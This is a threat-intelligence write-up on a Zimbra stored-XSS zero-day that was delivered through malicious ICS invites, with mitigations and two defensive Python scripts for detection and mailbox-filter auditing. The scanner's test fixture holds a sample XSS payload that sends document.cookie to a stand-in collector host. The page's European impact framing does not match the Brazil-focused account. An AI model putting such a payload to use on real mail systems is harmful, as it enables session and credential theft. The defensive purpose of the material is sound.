Zimbra Zero-Day Exploited to Target Brazilian Military via Malicious ICS Files
Description
A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military. Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient sanitization of HTML content in ICS calendar files,
AI Analysis
Technical Summary
CVE-2025-27915 is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client of Zimbra Collaboration, a widely deployed webmail and collaboration platform. The root cause is inadequate sanitization of HTML carried inside ICS calendar files, the format used for meeting invitations and calendar sharing. When a user views an email carrying a malicious ICS entry, the HTML it contains is rendered, and an ontoggle handler on a <details> element fires attacker-supplied JavaScript. That script runs in the browser inside the victim's authenticated webmail session, so it can do anything the user can do through the web client: read mail and contacts and, as observed in this campaign, create mail filters that redirect incoming messages to attacker-controlled addresses. This is client-side script execution in the user's session, not code execution on the Zimbra server.

In the observed campaign the attackers spoofed the Libyan Navy's Office of Protocol to deliver the ICS files to Brazilian military targets. The embedded JavaScript acted as a full data stealer, collecting credentials, emails, contacts and shared folders and sending them to the external host ffrk[.]net. To stay quiet it hides user interface elements that would reveal its activity and re-runs only if more than three days have passed since its last execution, which limits repeated, noisy activity in the same mailbox. Zimbra fixed the flaw in January 2025 (versions 9.0.0 Patch 44, 10.0.13 and 10.1.5); in-the-wild exploitation was publicly reported in October 2025. The tradecraft matches that of APT28, Winter Vivern and UNC1151, all of which have previously abused XSS flaws in webmail platforms to steal credentials and gain mailbox access, although the campaign has not been firmly attributed to any of them. The incident underlines that calendar data is rendered HTML from an untrusted sender and needs the same sanitization as a message body.
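The delivery pattern above (an HTML description inside an ICS property, carrying an inline event handler) is easy to check for at a mail gateway or in an incident triage script. The following is an added example written for this page, not code from the article, from Zimbra, or from the attackers; the ICS samples are constructed, the collector hostname and the invite contents are made up, and the scanner looks for any inline on* attribute or script element rather than only the ontoggle/<details> combination the campaign used.

```python
import re

# Constructed sample invite (not the real payload): the HTML description carries
# a <details ontoggle=...> handler of the kind described above, split across an
# RFC 5545 folded line the way mail clients emit long properties.
SAMPLE_ICS = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Example//Invite//EN
BEGIN:VEVENT
UID:invite-0001@example.invalid
DTSTART:20250115T090000Z
SUMMARY:Protocol meeting
DESCRIPTION:Please review the attached agenda.
X-ALT-DESC;FMTTYPE=text/html:<html><body><details open ontoggle="fetch('htt
 ps://collector.example.invalid/?c='+document.cookie)">Agenda</details></body></html>
END:VEVENT
END:VCALENDAR
"""

# Constructed benign invite: HTML formatting without any scriptable attribute.
BENIGN_ICS = """BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:invite-0002@example.invalid
SUMMARY:Weekly sync
X-ALT-DESC;FMTTYPE=text/html:<html><body><b>Agenda</b><br>1. Status</body></html>
END:VEVENT
END:VCALENDAR
"""

FOLD_RE = re.compile(r"\r?\n[ \t]")                         # RFC 5545 line fold
TAG_RE = re.compile(r"<\s*([A-Za-z][\w-]*)([^>]*)>", re.S)  # opening tags only
HANDLER_RE = re.compile(r"(?<![\w-])(on[a-z]+)\s*=", re.I)  # inline on* attributes


def unfold(ics: str) -> list[str]:
    """Undo line folding and return the non-empty content lines. A scanner that
    greps raw lines misses a payload that straddles a fold, as SAMPLE_ICS does."""
    return [ln for ln in FOLD_RE.sub("", ics).splitlines() if ln.strip()]


def split_property(line: str) -> tuple[str, str]:
    """'NAME;PARAM=V:value' -> ('NAME', 'value'). Sufficient for scanning; a
    full parser would also honour quoted parameter values containing ':'."""
    head, _, value = line.partition(":")
    return head.split(";", 1)[0].upper(), value


def find_event_handlers(html: str) -> list[tuple[str, str]]:
    """Return (tag, attribute) for every inline event handler in the markup,
    plus ('script', '') for each script element. Names are lowercased."""
    hits = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        if tag == "script":
            hits.append((tag, ""))
        hits.extend((tag, h.group(1).lower()) for h in HANDLER_RE.finditer(attrs))
    return hits


def scan_ics(ics: str) -> list[dict]:
    """Scan every property of an ICS file, whatever its name, because the HTML
    may sit in DESCRIPTION, X-ALT-DESC or a vendor-specific property."""
    findings = []
    for line in unfold(ics):
        name, value = split_property(line)
        for tag, attr in find_event_handlers(value):
            findings.append({"property": name, "tag": tag, "attribute": attr})
    return findings


if __name__ == "__main__":
    for hit in scan_ics(SAMPLE_ICS):
        print("suspicious:", hit)
    print("benign findings:", scan_ics(BENIGN_ICS))
```

Run against a real invite, the scanner reports the property that carried the handler (here X-ALT-DESC), which is what a gateway rule or a hunting query over quarantined mail needs. The unfolding step matters: RFC 5545 folding lets a sender split the string "ontoggle" or a URL across lines, and a signature that matches only raw lines is trivially evaded.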
Potential Impact
For European organizations, this vulnerability poses significant risk, especially for government, military and critical infrastructure entities that run Zimbra Collaboration. Successful exploitation gives an attacker the victim's webmail session: sensitive email can be read, credentials stolen, and mail filters created that redirect or copy incoming messages to an external address, enabling data breaches and espionage. Two properties make the observed payload more dangerous than a one-off script. The forwarding filter is stored in the account, so exfiltration continues after the browser session ends and after the page is patched unless the filter is found and removed, and the three-day re-execution check keeps the script from generating repeated, noticeable activity in the same mailbox. Organizations that rely on Zimbra for internal and external communications may face operational disruption and reputational damage. Calendar invitations are a routine part of business traffic and are scrutinized far less than executable attachments, so the ICS vector is both plausible to the recipient and easy to miss in attachment filtering. The medium CVSS score (5.4) reflects the flaw's technical impact in isolation, but the targeted use against a military and the espionage tooling attached to it raise the practical impact for high-value European targets. Organizations that patch late remain exposed to the same technique from advanced persistent threat (APT) groups with a track record against webmail.
Mitigation Recommendations
Patch first: apply Zimbra 9.0.0 Patch 44, 10.0.13, 10.1.5 or later on every server. This is the only actual fix for CVE-2025-27915; everything below is a compensating control or a detection and does not replace the patch.
- Hunt for existing compromise before trusting the patch. Review every account's mail filters for redirect or forwarding rules that send mail outside the organization, and any account-level forwarding settings, because a filter planted before patching keeps exfiltrating afterwards. Check proxy, DNS and firewall logs for connections to ffrk[.]net.
- Monitor filter rules continuously for unauthorized changes, especially newly created rules that redirect mail to external addresses, and alert on them rather than relying on periodic review.
- Quarantine or block ICS attachments from untrusted senders at the mail gateway, or strip HTML descriptions from inbound invitations. This is a coarse control that breaks legitimate external meeting invitations; if it cannot be applied broadly, scope it to high-risk mailboxes.
- Content Security Policy headers and web application firewalls help only at the margins here. The payload runs in the Zimbra origin with the user's own session, so a WAF sees ordinary calendar and mailbox traffic, and a CSP strict enough to block inline event handlers has to be set by the product itself rather than bolted on in front of it. Treat both as defense in depth, not as a substitute for the patch.
- Steer users away from the Classic Web Client, which is the affected component, until all servers are patched.
- Train users to treat unexpected calendar invitations from unfamiliar senders, particularly ones that impersonate official bodies, with the same suspicion as unexpected attachments.
- Log and alert on anomalous mailbox activity: bulk reads of contacts and shared folders, new filters, and session use from unfamiliar clients or networks.
- Assume credentials stolen from a compromised mailbox are reusable elsewhere: rotate them, enforce multi-factor authentication where the mailbox is a sign-on point, and apply least-privilege access and network segmentation so one compromised account does not become a foothold into other systems.
- Periodically audit collaboration platform configuration and user permissions to reduce the attack surface.
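The filter-rule review above is the check most likely to catch a mailbox that was compromised before patching. Zimbra keeps each user's filters as a sieve script in the account's zimbraMailSieveScript attribute, readable by an administrator with zmprov ga <account> zimbraMailSieveScript; those names are Zimbra's, quoted from memory here, so verify them against your version. The audit below is an added example for this page, not Zimbra tooling or anything from the incident: the sieve text is constructed, the rule names and addresses are invented, and the rule-name convention (a comment line above each rule) is an assumption about how the script is laid out.

```python
import re

# Constructed sample in the shape of a per-account sieve script. The "Forward
# all" rule is illustrative and is not the filter from the incident.
SAMPLE_SIEVE = '''require ["fileinto", "copy", "redirect"];

# Forward all
if anyof (header :matches ["subject"] "*") {
    redirect "collector@mail.example.invalid";
    keep;
}

# Newsletters
if header :contains "from" "news@corp.example" {
    fileinto "Newsletters";
    stop;
}

# Copy to assistant
if header :contains "subject" "[travel]" {
    redirect :copy "assistant@corp.example";
}
'''

# A redirect action on its own line: redirect "addr";  or  redirect :copy "addr";
# Anchored at line start so the "redirect" extension named in the require
# header is not mistaken for an action.
REDIRECT_RE = re.compile(r'^redirect\s+(?::copy\s+)?"(?P<addr>[^"]+)"')


def audit_sieve(script: str, internal_domains: set[str]) -> list[dict]:
    """Return every redirect whose target domain is not in internal_domains,
    attributed to the rule name taken from the nearest preceding comment."""
    findings, rule = [], "(unnamed)"
    internal = {d.lower() for d in internal_domains}
    for raw in script.splitlines():
        line = raw.strip()
        if line.startswith("#"):
            rule = line.lstrip("#").strip() or rule
            continue
        m = REDIRECT_RE.match(line)
        if not m:
            continue
        addr = m.group("addr")
        domain = addr.rpartition("@")[2].lower()
        if domain not in internal:
            findings.append({"rule": rule, "redirect_to": addr, "copy": ":copy" in line})
    return findings


def audit_accounts(scripts: dict[str, str], internal_domains: set[str]) -> dict[str, list[dict]]:
    """Run audit_sieve over {account: sieve script} and keep only accounts with hits."""
    report = {}
    for account, script in scripts.items():
        hits = audit_sieve(script, internal_domains)
        if hits:
            report[account] = hits
    return report


if __name__ == "__main__":
    # Hypothetical wiring: in production the scripts come from
    #   zmprov ga <account> zimbraMailSieveScript
    # for each account listed by  zmprov -l gaa  (strip the "zimbraMailSieveScript: "
    # prefix from the first output line before passing the text in).
    report = audit_accounts({"alice@corp.example": SAMPLE_SIEVE}, {"corp.example"})
    for account, hits in report.items():
        for h in hits:
            print(f"{account}: rule '{h['rule']}' redirects to {h['redirect_to']} (copy={h['copy']})")
```

Redirects that keep a copy (":copy") are the ones a user is least likely to notice, since mail still arrives normally; the report flags them explicitly so they can be prioritized. Run the audit once as a hunt across all accounts, then on a schedule, and diff the output so that a newly created external redirect raises an alert.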
Affected Countries
United Kingdom, Germany, France, Italy, Spain, Netherlands, Poland, Belgium
Technical Details
Article source: https://thehackernews.com/2025/10/zimbra-zero-day-exploited-to-target.html (fetched 2025-10-07T01:05:08Z, 981 words)
Threat ID: 68e467466a45552f36e85b15
Added to database: 10/7/2025, 1:05:10 AM
Last enriched: 10/7/2025, 1:06:37 AM
Last updated: 10/7/2025, 1:16:31 PM